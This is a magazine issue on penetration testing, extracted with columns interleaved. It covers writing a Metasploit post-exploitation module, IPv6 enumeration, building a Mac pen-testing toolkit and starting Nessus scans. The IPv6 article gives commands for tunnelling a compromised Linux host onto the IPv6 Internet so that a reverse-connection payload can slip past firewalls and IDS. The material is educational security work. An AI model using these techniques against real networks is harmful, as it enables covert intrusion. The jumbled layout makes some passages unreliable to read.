while(not apps.empty?)
1.upto(16) do
t << framework.threads.spawn(Module(#{self.refname}), false, apps.shift) do |k|
dispnm = registry_getvaldata(#{k},DisplayName)
dispversion = registry_getvaldata(#{k},DisplayVersion)
tbl << [dispnm,dispversion] if dispnm and dispversion

Listing 12. The functions of the script

results = tbl.to_s
print_line(\n + results + \n)
p = store_loot(host.applications, text/plain, session, results, applications.
txt, Installed Applications)
print_status(Results stored in: #{p})
def run
print_status(Enumerating applications installed on #{sysinfo[Computer]})

www.hakin9.org/en 19
in order to execute the module. To start with build- ing system and gathers information about the sys-
ing the module we will first import the framework tem. So our module should follow this convention
libraries and include required dependencies (List- for storing.
ing 9). So our destination folder should be modules/
The script starts with including the metasploit post/windows/gather/.
core libraries. Then we build up the class that ex- You can save the module with your desired name
tends the properties of Msf::Post modules. and with a .rb extension. Lets save it as enum_
Next we create the initialize function which is applications.rb.
used to initialize and define the module proper-
ties and description. This basic structure remains Making the Module work
the same in almost all modules. Now our next Once we have saved the module in its preferred di-
step will be to create a table that can display rectory, the next step will be to execute it and see
our extracted result. We have a special library if it is working fine.
Rex::Ui::Text which can be used for this task.
We will have to define different columns (Listing msf> use post/windows/gather/enum_applications
10). msf post(enum_applications) > show options
The script body starts with building the table and
providing different column names. Then a sepa- Module options (post/windows/gather/enum _
rate array of registry locations is created which will applcations)
be used to enumerate the application list. The ap-
plication information is maintained in a separate Name Current Setting Required Description
array named as apps. SESSION yes The session..
Then we start the enumeration process by run-
ning a loop that looks into different registry loca- This was a small example of how you can build
tions stored in appskey array (Listing 11). and add your own module to the framework.
The next lines of script populate the table with You definitely need a sound knowledge of Ruby
different values in respective columns. The script scripting if you want to build good modules. You
uses in-built function registry_getvaldata which can also contribute to the metasploit community
fetches the values and add them to the table (List- by releasing your module and let others benefit
ing 12). from it.
The last few lines of the script is used for stor-
ing the information in a separate text file called
applications.txt. The file is populated by using the
store_loot function which stores the complete ta-
ble in the text file.
Finally an output is displayed on the screen stat-
ing that the file has been created and results have
been stored in it.
The next step will be to store the complete pro-
gram in respective directory. You have to makes
sure that you choose the correct directory for stor-
ing your module. This will help the framework in Abhinav Singh
clearly understanding the utility of module and will Abhinav Singh is a young information
maintain a hierarchy. security specialist from India. He has a
To identify the location of module storage, there keen interest in the field of Hacking and
are following points you should look at: Network security and has adopted this
field as his full time employment. He is
Type of module the author of Metasploit penetration
Operation performed by the module testing cookbook, a book dealing with
Affected software or operating system. Metasploit and penetration testing. He is also a contrib-
utor of SecurityXploded community. Abhinavs work has
These are a few points to keep in mind before you been quoted in several portals and technology maga-
save any module in any folder. Let us consider our zines worldwide. He can be reached at:
module. This module is a post exploitation mod- Mail: abhinavbom@gmail.com.
ule that is used to enumerate a windows operat- Twitter: @abhinavbom

20 09/2012

How to Explore
the IPv6 Attack Surface with Metasploit

IPv6 is often described as a parallel universe, co-existing alongside

existing IPv4 infrastructure in a bid to ease the transition process.
Often left unmanaged and unmonitored in networks, those IPv6
packets could provide a great opportunity for the savvy attacker.
Thanks to the Metasploit framework, exploring the IPv6 attack
surface has become a lot easier.

arlier this year, the creators of the Metasploit ing to see that even after the project transitioned
Framework introduced support for IPv6. from a pure open source project to commercially
Adding tools to allow attackers and defend- owned and operated one (Metasploit was acquired
ers to explore this brave new world, and the in- by Rapid 7 in 2009), the community is still contrib-
creased attack surface it can offer. uting, and those contributions are still released un-
In this article we will introduce Metasploits three der the original open-source license. According to
IPv6 enumeration modules, how to use them, and Rapid 7, this will never change.
what they are doing under the hood. Well al-
so cover the core IPv6 concepts that allow these
modules to function as they do. Finally, well take
a look a configuring an IPv6 tunnel from a compro-
mised host, to allow the use of a reverse connec-
tion IPv6 payload over the IPv6 Internet.
I find few commands as satisfying to execute
as msfupdate. To many this may sound like a
strange statement, but there are plenty of people
who will completely understand where Im coming
Every time I enter msfupdate, I sit back in my
chair and watch as my copy of the Metasploit
Framework connects to the Metasploit servers and
downloads the latest modules. I run that command
at least daily, and every time I do, it always grabs
me something new to dissect and work into my
penetration-testing toolbox.
Im often surprised by the frequency and volume
of some of the updates, but really I shouldnt be. Af-
ter all, the whole purpose of the Metasploit project
is to provide a modular framework that allows ex-
ploits to be written in a standardized fashion to en- Figure 1. Typical output from msfupdate containing new
courage community collaboration. Still, its refresh- additions and updates to existing

22 09/2012
Earlier this year msfupdate fetched some up- is key for network administrators to successful-
dates that made me lean forward faster and look ly implement the new protocol in a secure fash-
a little closer than perhaps I normally would. ion. The biggest insecurity in IPv6 at the moment
Metasploit downloaded a selection of modules is that there are very few IPv6-only networks out
with IPv6 in the description. there.
IPv6 has been creeping into our lives over the 99% of the time youll find spots of IPv6 traffic
past several years. Our operating systems, net- wandering across the same wires as its older sib-
work equipment and phones have been gradually ling, quietly going about its business. Similarly,
adding support for the new version of the protocol 99% of the time you can ask a network adminis-
that will keep future networks and the internet run- trator what they think that traffic is up to and theyll
ning, when the current version of the internet pro- reply with something along the lines of erm, well
tocol (IPv4) is finally retired due to address space thats just noise, we dont use IPv6 yet.
exhaustion. They likely arent doing anything with v6 just yet,
As you might expect, IPv6 offers some advantag- but that doesnt mean the devices sitting on the
es over its predecessor. Primarily, the vast address network arent. Out of the box, IPv6 is designed
space will ensure that theoretically every grain of to go find the quickest way to the Internet. When
sand on the planet could own an Internet connect- you think of it like that, perhaps its time for network
ed device and not have to worry about hiding be- admins to get all up in IPv6s business and see
hind a NATed IP. Additionally, IPv6 supports state- what its up to. After all, if devices are using it to
less auto-configuration meaning that network communicate freely, then so can we.
administrators will no longer have to set up and Currently Metasploit features a handful of scan-
manage DHCP servers, as IPv6 can figure itself ner modules for IPv6 discovery, and IPv6 enabled
out via the use of such mechanisms as neighbor versions of its traditional payloads. A quick and
discovery protocol messages sent via ICMP ver- easy way to locate the IPv6 modules is to run the
sion 6. command search ipv6 from within the Metasploit
This is by no means an extensive list of differ- Console (Figure 2).
ences, but Id like to pause and consider the sec- Lets take a moment to dissect the scanner mod-
ond advantage of IPv6 Ive just mentioned from ules, and what we can learn from them. First up is
a security perspective. Its this feature of IPv6 that ipv6_multicast_ping, written by wuntee.
the first batch of Metasploit IPv6 modules take ad- This module sends a number of ICMPv6 pack-
vantage of. ets to the various IPv6 addresses that are defined
One thing should be made very clear before we as multicast addresses, to which all IPv6 enabled
go any further. IPv6 is not any more or less se- hosts should respond. Then it listens for the IC-
cure than IPv4. They both do different things in MPv6 echo-reply responses and records both
different ways, and understanding the differences the IPv6 address and the hardware (MAC) ad-

Figure 2. Currently Metasploit offers three auxiliary scanner modules for IPv6 discovery and multiple payloads that run over IPv6

www.hakin9.org/en 23
dress of the responding host. Very quickly we can uniquely identify a host on the Internet. Site-local
learn which hosts on our local network are IPv6 should be considered equivalent to RFC1918 pri-
enabled. When configuring the module we have vate IP addressing and is used within a specific
the option of specifying the source IPv6 address site, such as an office. Interface-local is similar to
and source MAC. The only mandatory option is a an APIPA or 169.* IPv4 address, and is automat-
timeout, which is set at 5 seconds by default (Fig- ically generated to allow communication across a
ure 3). link without the need for any other routing infor-
Lets take a closer look at the IPv6 multicast ad- mation.
dresses we ping with this module. IPv6 addresses One difference between link-local addresses in
have a scope in which they are considered valid IPv6 and IPv4 is that there always needs to be one
and unique. This could be an address in the global assigned to every IPv6 enabled interface even
scope, the site scope, link-local or interface local when it has other addresses. That means that as
scope. Each scope features a well-known multi- long as there is IPv6 on the network, there will
cast address, which certain types of host are ex- be link-local addresses in the link-local multicast
pected to join. The module has a sequential list of scope. You can spot a link-local address because
those addresses that it works its way through. We it will have the prefix fe80. As you might expect,
can pull those addresses from the Ruby code for these addresses cannot be routed over the Inter-
the module. net. So while they can be used to communicate
with a machine in the same layer 2 broadcast do-
FF01::1 All nodes on the interface-local mains as the host you are working from, if you want
scope. to be able to have fun across the IPv6 Internet, a
FF01::2 All routers in the interface-local global address is required. Well talk about obtain-
scope. ing one of those later.
FF02::1 All nodes in the link-local scope. Our next Metasploit module is ipv6_neighbor,
FF02::2 All routers on the link-local scope. created by belch <>. This enumeration module
FF02::5 All OSPFv3 link state routers. takes advantage of Neighbor Discovery Proto-
FF02::6 All OSPFv3 designated routers. col (NDP). NDP uses a subset of ICMPv6 pack-
FF02::9 All RIP routers. ets used by IPv6 to perform various auto-config-
FF02::a All EIGRP routers. uration and link state monitoring tasks to find the
FF02::d All Protocol Independent Multicast link-local addresses of IPv6 hosts within the same
routers. segment.
FF02::16 Multicast Lister Discovery reports. As an aside, one such NDP task is determining
FF02::1:2 All DHCP servers in the link-local if its intended link-local address is already in use.
scope. This process, imaginatively called duplicate ad-
FF05::1:3 All DHCP servers in the site-local dress detection (DAD), is actually prone to denial
scope. of service. Tools exist, although not presently mod-
ulized in Metasploit, which will respond to all DAD
To better understand the idea of IPv6 scopes we requests with address in use messages. This will
can compare them to their IPv4 equivalents. The prevent any new IPv6 devices that join the network
global scope is best compared to any public IP
address range in IPv4. A global IPv6 address can

Figure 3. Quickly locating nearby IPv6 enabled hosts with Figure 4. Mapping the relationship between IPv4 and IPv6
ipv6_multicast_ping link-local addresses

24 09/2012
from configuring a link-local address, as every op-
tion it advertises will be reported as a duplicate.
One such tool for this task is dos-new-ip6 written
by van Hauser.
Back to the module in question. Its purpose is
to take an IPv4 range and show you the relation-
ship between the IPv4 and IPv6 addresses on the
target network. This allows you to quickly identify
which hosts are dual-stacked, that is, running both
IPv4 and IPv6 side by side (Figure 4).
To do this it actually completes two tasks as
part of its execution. The first is a blast from the
past we perform an ARP sweep of the given
IPv4 range, to learn the MAC address of each The Most Comprehensive Exhibition
IPv4 host. Secondly it will send an ICMPv6 neigh- of the Fastest Growing Sectors of recent years
bor solicitation packet, from which well learn the
MAC address of the IPv6 enabled host. Compare
in the Center of Eurasia
the two MAC addresses, if any match we have
our mapping.
Seeing these two processes side-by-side is in-
ARP replacement, and we can compare the way
they go about doing the same job. Unlike IPv4,
IPv6 does not implement broadcast. The reason
for this is efficiency. Traditional ARP uses broad-

cast to query all the hosts on the subnet to find SMART HOUSES AND BUILDING AUTOMATION EXHIBITION

the MAC address of an IPv4 host so it can make

a layer 2 delivery. In other words, everyone gets
bugged every time someone wants to locate a
MAC address.
In IPv6, the process relies on multicasting
which is means that fewer hosts get bugged and 16th INTERNATIONAL SECURITY AND RFID EXHIBITION

the address resolution process is much quicker.


Neighbor solicitation packets are sent to a spe-

cial kind of multicast address known as a solic-
ited-node multicast address. Each IPv6 interface
will have such an address and its purpose is to
provide the layer 2 (mac address) of the host.
These addresses are generated using an simple
algorithm, which will drop all but the last 24 bits of
the hosts regular unicast address and append it
with the prefix FF02::1:FF00:0/104.
Using Wireshark to capture the ICMPv6 pack-
ets sent out by the Metasploit module we can see
these addresses in action (Figure 5).
Notice how in packets 231 and 232, we send a
neighbor solicitation to the solicited-node multicast
address ff02::1:ff8f:ddb3, and we get our re- SEPTEMBER 20th - 23rd, 2012
sponse back in the form of a neighbor advertise-
ment from the unicast link-local address of the host IFM ISTANBUL EXPO CENTER (IDTM)
(fe80::7256:81ff:fe8f:ddb3). An ICMPv6 neighbor
advertisement can either be sent in response to a
solicitation, as weve just shown, or it can be sent
unsolicited to an all-node multicast address to in-
form neighbors of a change in address or link state.

The final scanner module currently in Metasploit set at 5 and 1 seconds respectively. Once we run
is ipv6_neighbour_router_advertisement, which the module it will begin sending advertisements
like ipv6_multicast_ping is also written by wun- for the network prefix 2001:1234:dead:beef to the
tee. multicast address FF02::1, which as we know from
ICMPv6 router advertisements and solicitations earlier is all nodes in the link-local scope. Inci-
are fairly similar to neighbor advertisements and dentally, this network prefix is hard coded into the
solicitations, but as you can probably guess, are modules source (Figure 7).
used to discover routers rather than regular Upon receipt of the advertisement all hosts on
hosts. Routers transmit advertisements on a reg- the local scope will begin auto-configuration of a
ular basis via multicast, and also in response to new IPv6 address within the new prefix (Figure 8).
router solicitations from hosts on the network. Of the three enumeration modules weve looked
This module will aim to enumerate link-local at, this is by far the nosiest and therefore the most
IPv6 addresses by crafting and transmitting false likely to be detected. We are actually taking the
router advertisements for a new network prefix time to set an address on the remote host, and
via multicast. In turn this will trigger any hosts in there is no guarantee that the interface portion of
that multicast scope to start the auto-configura- the new address will match the link-local address
tion process, create a new global IPv6 address calculated by the module. Some systems imple-
on its interface and send a neighbor advertise- ment randomization in the interface portion. Hav-
ment for that address. The module will then ma- ing said that, its always good to have different
nipulate the IPv6 address in the advertisement, ways of achieving the same goal!
dropping the newly acquired global prefix and So far weve concentrated on the auxiliary mod-
replacing it with the standard link-local prefix. Fi- ules in the Metasploit framework and doing some
nally, to confirm that the enumerated address is basic IPv6 enumeration in the link-local scope.
in fact alive it will send out a neighbor solicitation This is an important first step and assumes that
message. you already have some sort of foothold into the
This works under the assumption that the operat- network, but lets say we now want to take things
ing system uses the same interface portion of the one-step further. We are going to try a break out
IPv6 address on all of its addresses (Figure 6). onto the IPv6 Internet, and that means well need
So lets take a closer look at the module in action. a tunnel.
We dont need to provide any options other than a The idea of tunneling out using IPv6 encapsulat-
couple of timeout parameters, which by default are ed in IPv4 packets is a very attractive proposition,

Figure 5. ICMPv6 NDP packets, sent initially to the solicited-node multicast addresses of each host

Figure 6. Using false router advertisements with ipv6_ Figure 7. Sending an ICMPv6 router advertisement message
neighbor_router_advertisement to obtain link-local for the network prefix 2001:1234:dead:beef, as captured by
addresses Wireshark

26 09/2012
as many controls, such as IPS/IDS and firewalls Target Machine IPv4 Address
will not be configured to alert on or prevent such Target Machine IPv6 Address 2001:DB8::21
traffic leaving.
So the scenario is as follows weve compro- Note
mised a Linux machine using Metasploit and we You may have noticed the outside IPv4 and IPv6
have a shell. The host has IPv6 support and a addresses used in this example will not work in
link-local address. Now we want to create a glob- real life. The IPv6 address prefix Ive used is re-
al IPv6 address on the box to allow it to commu- served for documentation, and is not routable over
nicate back to us over the IPv6 Internet for extra the Internet.
obscurity. When configuring the tunnel in the he.net site, you
You need two things to get an IPv6 tunnel to work must provide the outside IPv4 address of the target.
a tunnel broker, of which there are plenty, many It should also be noted, that he.net site requires that
of them are free of charge. Secondly, if the box this address responds to ping (Figure 10).
you are working on is behind a NAT device, it must Back on our victim machine, we run a few com-
support the forwarding of protocol 41 in other mands to bring up the new tunnel interface and set
words, IPv6 encapsulated in IPv4. If we are behind up a route to ensure all IPv6 traffic goes via that
a NAT device that doesnt forward protocol 41, we new interface.
are out of luck (Figure 9). ip tunnel add ipv6inet mode sit remote
For the purposes of this example Ill be using local ttl 255 This
a tunnel provided by Hurricane Electric (he.net). creates a SIT (simple internet transition) interface
Once signed up, the tunnel broker provides both named ipv6inet and defines the local and remote
a client and server IPv6 address, and an IPv4 ad- IPv4 addresses for the tunnel endpoints, or in oth-
dress of the tunnel broker server. er words, the IP of the target machine and tunnel
These values will be as follows: server.
ip link set ipv6inet up This brings the tunnel
HE.net Tunnel Server IPv4 address interface up.
HE.net Tunnel Server IPv6 address 2001:DB8::20
Target Network Outside NAT IPv4 address

Figure 8. Two outputs of ifconfig on a Mac OS X machine

on the same network as our Metasploit instance. The first
Figure 10. Signing up for an IPv6 tunnel from Hurricane
output is pre-false advertisement, the second is just after.
Electric (ipv6.he.net)
Notice the addition of a dead:beef IPv6 address, thanks to

Figure 9. On the compromised Linux host webapp1, eth0 Figure 11. Creating an IPv6 tunnel interface on the target
has an IPv4, and link-local IPv6 address machine

www.hakin9.org/en 27
ip addr add 2001:db8::21 dev ipv6inet This To summarize, lets take one last look at the sce-
assigns the IPv6 address to the interface. nario weve just discussed (Figure 14).
ip route add ::/0 dev ipv6inet This com-
mand will add a route to send all IPv6 traffic across Conclusion
the new tunnel interface (Figure 11). For many out there, the mere sight of an IPv6
A quick way to confirm that the IPv6 Internet address is enough to put them off learning more
is now within our reach is to use the ping6 utili- about the protocol. This is the biggest vulnerability
ty to hit an IPv6 website. In this case ipv6.google. in IPv6, and like most security vulnerabilities, its
com, which has the address 2607:f8b0:400e:c00 a human problem. The protocol is being adopted
::93. in devices at a much quicker rate than people are
This tunnel can now be used by a Metasploit re- willing to manage and configure it properly.
verse connection payload to connect to an attack- For attackers, this provides great opportunities to
er with a global IPv6 address of their own, which of jump on the unmanaged jumble and use it to build
course can be obtained in exactly the same way as something that can be used to move around net-
weve just shown. works in ways that the owners of those networks
Lets say in this example we want our payload to arent expecting.
connect back to us at the address 2001:db8::99 For defenders, this means developing a whole
(Figure 13). new security model with emphasis on securing the
Configuring an IPv6 payload in Metasploit is es- endpoints rather than the perimeter. After all, IPv6
sentially the same as an IPv4 payload, but there doesnt hide behind NAT like its predecessor.
are a couple of minor differences. Obviously, you By introducing IPv6 payloads and modules the
must specify an IPv6 address for your listener (or Metasploit framework has given both groups new
target if a binding payload), and also if using a link- tools to better understand and manipulate the
local address on a host with multiple interfaces, IPv6 protocol. Of course, we are only just getting
you should specify the scope ID. started. The nature of the Metasploit community
is to constantly build, innovate and improve upon
what is already in place. These initial modules
will act as a catalyst for further development in
IPv6 enumeration and exploitation. Remember
Figure 12. Sending ping packets to Google over the IPv6 that the next time you run msfupdate, and keep
Internet using our new tunnel interface
one eye open for new ways to use IPv6 for ex-

Figure 13. Setting up an IPv6 payload in Metasploit

Mike Sheward
Mike Sheward is a security specialist
for a software-as-a-service provider
based in Seattle. He began his career
as a network engineer working in the
British public sector. During this time
he developed a passion for security
and started on a path that led him to
a full-time security role with a private
organization. Mike has performed
penetration testing for a wide range of public and pri-
vate sector clients, has been involved in a number of
digital forensics investigations and has delivered securi-
Figure 14. An overview of our IPv6-over-IPv4 tunnel set up ty training to fellow IT professionals.

28 09/2012

How to Use The Mac

OS X Hackers Toolbox
When you think of an operating system to run pen testing tools on,
you probably think of Linux and more specifically BackTrack Linux.
BackTrack Linux is a great option and one of the most common
platforms for running pen testing tools. If you are a Mac user, then
you would most likely run a virtual machine of BackTrack Linux.

hile his is a great option, sometimes it is mostly due to the PostgreSQL database setup.
nice to have your tools running on the The majority of hacking tools are command line
native operating system of your comput- based, so they are easy and are fairly straight for-
er. Another benefit is to not having to share your ward to install.
system resources with a virtual machine. This also In this article I am going to take you through in-
eliminates the need to transfer files between your stalling and configuring some of the most popu-
operating system and a virtual machine, and the lar and useful hacking tools such as Metasploit on
hassles of having to deal with a virtual machine. Mac OS X. If you are interested in maximizing the
Also by running the tools within OS X, you will be use of your Mac for pen testing and running your
able to seamlessly access all of your Mac OS X tools natively, then you should find this article help-
applications. ful.
My attack laptop happens to be a MacBook Pro
and I started out running VirtualBox with a Back- The Tools
Track Linux virtual machine. I recently started in- The pen test tools we will be installing is a must
stalling my hacking tools on my MacBook Pro. have set of tools and all of them are free, with the
I wanted to expand the toolset of my Mac, so I exception of Burp Suite and Nessus. Although
started with Nessus, nmap, SQLMap, and then I Burb Suite has a free version, which offers a por-
installed Metasploit. My goal is to get most if not tion of the Burp Suite tools for free. The tools of-
all of the tools I use installed on my MacBook Pro fered for free with Burp Suite are useful tools and I
and run them natively within OS X. Since Mac highly recommend them. The professional version
OS X is a UNIX based operating system, you get of Burp Suite is reasonably priced.
great tools that comes native within UNIX operat-
ing systems such as netcat and SSH. You also Metasploit Framework
have powerful scripting languages installed such Nmap
as Perl and Python. With all of the benefits and SQLmap
features of the Mac OS X, there is no reason to Burp Suite
not use Mac OS X for your pen testing platform. I Nessus
was really surprised to not see a lot of information SSLScan
on the subject of using Mac OS X as pen testing/ Wireshark
hacking platform. Metasploit was the toughest ap- TCPDUMP
plication to get running on Mac OS X and that was Netcat

30 09/2012
Metasploit Framework Install the MacPorts app
The Metasploit Framework is one of the most pop-
ular and powerful exploit tools for pen testers and a Download and install the package file (.dmg)
must have for pen testers. The Metasploit Frame- file from the MacPorts web site; https://distfiles.
work simplifies the exploitation process and allows macports.org/MacPorts/
you to manage your pen tests with the workspace Once the files is downloaded install MacPorts.
function in Metasploit. Metasploit also allows you More information on MacPorts can be found
to run nmap within Metasploit and the scan infor- here: http://www.macports.org/install.php
mation is organized by project with the workspace Run MacPorts selfupdate to make sure it is us-
function. You can create your own exploits and ing the latest version.
modify existing exploits in Metasploit. Metasploit From a terminal window run the following com-
has many more features and too many to mention mand:
in this article, plus the scope of this article is dem- $ sudo port selfupdate
onstrate how to install Metasploit and other pen
testing tools. Ruby 1.9.3
Mac OS X is preinstalled with Ruby, but we want to
The Install upgrade to Ruby 1.9.3
Before we install Metasploit, we need to install
some software dependencies. It is a little more We will be using MacPorts to upgrade Ruby.
work to install Metasploit on Mac OS X, but it will From a terminal window run the following com-
be worth it. Listed below are the prerequisite soft- mand:
ware packages. $ sudo port install ruby19 +nosuffix
The default Ruby install path for MacPorts is: /
Software Prerequisites opt/local/
Its a good idea to verify that the PATH is cor-
MacPorts rect, so that opt/local/bin is listed before /
Ruby1.9.3 usr/bin. You should get back something that
Homebrew looks like this:
PostreSQL /opt/local/bin:/opt/local/sbin:/usr/bin:/bin:/
MacPorts Installation You can verify the path by entering the follow-
Install Xcode ing syntax in a terminal window:
$ echo $PATH
Xcode Install from the Apple App Store, or it To verify the Ruby install locations, enter this
can be downloaded from the following URL; syntax:
https://developer.apple.com/xcode/ $ which ruby gem
Once Xcode is installed go into the Xcode pref- You should get back the following response:
erences and install the Command Line Tools. /opt/local/bin/ruby
(see Figure 1) /opt/local/bin/gem

Database Installation
A database is not required to run, but some of the
features of Metasploit require that you install a data-
base. The workspace feature of Metasploit is one of
the really nice features of Metasploit that requires a
database. Workspace allows easy project organiza-
tion by offering separate workspaces for each proj-
ect. PostgreSQL is the vendor recommended and
supported database, but MySQL can be used. In
this article, we will be using PostgreSQL.
We will use Homebrew to install PostgreSQL. I
tried a few different installation methods, but this is
the easiest way to install PostgreSQL. Homebrew
is good method to install Open Source software
Figure 1. Install Command Line Tools packages.

www.hakin9.org/en 31
First we will install Homebrew. Metasploit software installation
From a terminal window run the following com- The dependencies have been installed and next
mand: we will be installing the Metasploit software.
$ ruby -e $(curl -fsSkL raw.github.com/mxcl/
homebrew/go) Download the Metsploit source code for in-
Next we will install PostgreSQL using Home- stallation using the link provided below and do
brew. not download the .run file from the Metasploit
From a terminal window run the following com- download page. Download the Metasploit tar
mand: file from: http://downloads.metasploit.com/data/
$ brew install postgresql releases/framework-latest.tar.bz2.
Next we initialize the database, configure the Once the download is complete, untar the file.
startup, and start PostgreSQL. If you have software installed to unzip or untar
From a terminal window run the following com- files, then it should untar the file when the file
mand: is finished downloading. I use StuffIt Expander
initdb /usr/local/var/postgres cp /usr/ and it untarred the file for me upon completion
local/Cellar/postgresql/9.1.4/homebrew.mxcl. of the download. If you need to manually un-
postgresql.plist ~/Library/LaunchAgents/ tar the file, type this command at the command
launchctl load -w ~/Library/LaunchAgents/ line and it will untar the file into the desired di-
homebrew.mxcl.postgresql.plist pg_ctl -D / rectory:
usr/local/var/postgres -l /usr/local/var/ $ sudo tar xvf framework-lastest-tar.bz2
postgres/server.log start C /opt
Database configuration If the file was untarred for you as mentioned,
In this step we will create our Metasploit data- you will need to move the Metasploit source
base and the database user. file structure to the opt directory. Your directory
The Homebrew install does not create the pos- structure should look like this:
gres user, so we need to create the postgres /opt/metasploit3/msf3
user to create databases and database users.
At a command prompt, type the following: Starting Metasploit
$ createuser postgres _ user -P Now that Metasploit is installed, we will start
$ Enter password for new role: password Metasploit for the first time. You will need to navi-
$ Enter it again: password gate to the Metasploit directory and start Metasploit.
$ Shall the new role be a superuser? (y/n) y
$ Shall the new role be allowed to create Navigate to the Metaploit directory with the fol-
databases? (y/n) y lowing syntax entered at the command line:
$ Shall the new role be allowed to create $ cd /opt/metasploit/msf3
more new roles? (y/n) y To start Metasploit, simply enter the following
Creating the database user syntax:
At a command prompt, type the following: $ sudo ./msfconsole
$ createuser msf _ user -P You will get one of the many Metasploit
$ Enter password for new role: password screens like the one in Figure 2.
$ Enter it again: password
$ Shall the new role be a superuser? (y/n) n
$ Shall the new role be allowed to create
databases? (y/n) n
$ Shall the new role be allowed to create
more new roles? (y/n) n
Creating the database
At a command prompt, type the following:
$ createdb --owner=msf _ user msf _ database
Install the pg gem.
At a command prompt, type the following:
$ gem install pg

The database and database user are created, so Figure 2. This is one of the many Metasploit screens you will
now it is time to install Metasploit. see when launching Metasploit

32 09/2012
Connecting to the database [*] postgresql connected to msf_database
In this next step we will connect Metasploit to
our PostgreSQL data base. From the Metasploit The database is now connected to Metasploit, but
prompt, type the following syntax: once you exit Metasploit the database will be dis-
connected. To configure Metasploit to automat-
msf > db_connect msf_user:password@ ically connect on startup, we will have to create
database the msfconsole.rc file.
Enter the following syntax at the command
You will see the following message and you prompt:
should be connected.
$ cat > ~/.msf3/msfconsole.rc << EOF db_connect
[*] Rebuilding the module cache in the background...
-y /opt/metasploit3/config/database.yml
Type in the following syntax to verify the database EOF
is connected:
Updating Metasploit
msf > db_status Now that we have Metasploit installed and con-
figured, we will update the Metasploit installation.
You will get the following back verifying the data- From the command prompt, type the following syn-
base is connected: tax:

Listing 1. Database Backend Commands as displayed in $ ./msfupdate

the Metasploit console
This can take a while, so just set back and let the
Database Backend Commands update complete. Make sure to update Metasploit
========================= frequently so you have the latest exploits.

Command Description The benefits of Metasploit with database

------- ----------- Metasploit is installed, the database is connected
creds List all credentials in the and ready to use. So what can I do with Metasploit
database with a database that I couldnt do without one?
db_connect Connect to an existing database Here is a list of the new functionality gained by us-
db_disconnect Disconnect from the current ing a database with Metaploit.
database instance Here is a list of the Metasploit Database Back-
db_export Export a file containing the end Commands taken directly from the Metasploit
contents of the database console: Listing 1.
db_import Import a scan result file The commands are pretty much self-explanatory,
(filetype will be auto-detected) but to it should be noted that db_import allows you
db_nmap Executes nmap and records the to import nmap scans done outside of Metasploit.
output automatically This comes in handy when you are working with
db_rebuild_cache Rebuilds the database-stored others on a pen test and you want to centrally
module cache manage your pen test data. As mentioned earlier,
db_status Show the current database workspace helps you manage your pen tests by al-
status lowing you to store them in separate areas of the
hosts List all hosts in the database database.
loot List all loot in the database A great reference guide for Metasploit can be
notes List all notes in the database found at Offensive Securitys website: http://www.
services List all services in the offensive-security.com/metasploit-unleashed/
database Main_Page.
vulns List all vulnerabilities in the
database Nmap
workspace Switch between database Nmap is an open source network discovery and
workspaces security auditing tool. You can run nmap within
Metasploit, but it is good to have nmap installed so
you can run nmap outside of Metasploit.

www.hakin9.org/en 33
We will use Homebrew to install nmap. From the To install sslscan, type the following syntax at the
command prompt, type the following syntax: command prompt:

$ brew install nmap $ brew install sslscan

Visit the Nmap website for the Nmap reference Wireshark

guide: http://nmap.org/book/man.html. Wireshark is a packet analyzer and can be useful
in pen tests.
SQLmap Wireshark DMG package can be downloaded
SQLmap is a penetration testing tool that detects from the Wireshark website: http://www.wireshark.
SQL injection flaws and automates SQL injection. org/download.html.
From the command prompt, type the following syn- Once the file is downloaded, double click to in-
tax: stall Wireshark.

$ git clone https://github.com/sqlmapproject/ TCPDUMP

sqlmap.git sqlmap-dev TCPDUMP is a command line packet analyzer that
is preinstalled on Mac OS X. For more information
Burp Suite consult the man page for tcpdump, by typing the
Burp Suite is a set of web security testing tools, in- following syntax at the command prompt:
cluding Burp Proxy. To install Burp Suite, download
it from: http://www.portswigger.net/burp/download. $ man tcpdump
To run Burp, type the following syntax from the Netcat
command prompt: Netcat is a multipurpose network utility that is pre-
installed on Mac OS X. Netcat can be used for port
$ java -jar -Xmx1024m burpsuite_v1.4.01.jar redirection, tunneling, and port scanning to just
name a few of the capabilities of netcat. Netcat is
For more information on using Burp, go to the used a lot for reverse shells. For more information
Burp Suite website: http://www.portswigger.net/ on netcat, type the following syntax at the com-
burp/help/. mand prompt:

Nessus $ man nc
Nessus is a commercial vulnerability scanner and
it can be downloaded from the Tenable Network Conclusion
website: http://www.tenable.com/products/nessus/ Follow the instructions in this article, you will have
nessus-download-agreement. a fully functional set of hacking tools installed on
Download the file Nessus-5.x.x.dmg.gz, and your Mac and you will be able to run them natively
then double click on it to unzip it. Double click on without having to start a virtual machine or deal with
the Nessus-5.x.x.dmg file, which will mount the the added administrative overhead that comes with
disk image and make it appear under Devices in running a virtual machine. You will also not have to
Finder. Once the volume Nessus 5 appears in share resources with a virtual machine. I hope you
Finder, double click on the file Nessus 5. found this article useful and I hope you enjoy setting
The Nessus installer is GUI based like other Mac up your Mac OS X hacker toolbox as much as I did.
OS X applications, so there are no special instruc- With Macs gaining popularity, I can only imagine
tions to document. The Nessus 5.0 Installation and they will become more widely used in pen testing.
Configuration Guide as well as the Nessus 5.0 Us-
er Guide can be downloaded from the documenta- Phillip Wylie
tion section of the Tenable Network website: http:// Phillip Wylie is a security consul-
www.tenable.com/products/nessus/documenta- tant specializing in penetration
tion. testing, network vulnerability as-
sessments and application vul-
SSLScan nerability assessments. Phillip has
SSLScan queries SSL services, such as HTTPS, over 8 years of experience in infor-
in order to determine the ciphers that are support- mation security and 7 years of system administration
ed. experience.

34 09/2012
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How to Scan
with Nessus from within Metasploit

When you perform a penetration test with Metasploit you

sometimes import vulnerability scanning results for example Nessus
Vulnerability Scanner. Usually you start the scan externally from
Metasploit framework and then import the results into Metasploit.

hat you can do is to manage the Nessus http://www.nessus.org and download the Ubuntu
scan from within Metasploit and easily 11.10 version for your architecture (32-bit or 64-
import the results into your process. But bit).
lets start from the beginning.
What you should know Install Nessus by running
To get the most of this article you should have a
working (and preferably updated) BackTrack 5 R3 32-bit
system, 32-bit or 64-bit shouldnt matter but I per-
sonally run a 32-bit system in a virtual machine. # dpkg --install Nessus-5.0.1-ubuntu1110_i386.deb
This article makes extensive use of the command
line so you should preferably be familiar with that. 64-bit

What you will learn # dpkg --install Nessus-5.0.1-ubuntu1110_amd64.deb

After reading this article you should know how to
run a Nessus scan both from the Nessus console
and, more importantly, from within the Metasploit

Installing Nessus on BackTrack 5 R3

To run a Nessus vulnerability scan from the
Metasploit console you first need to have a Nes-
sus installation somewhere. Please refer to http://
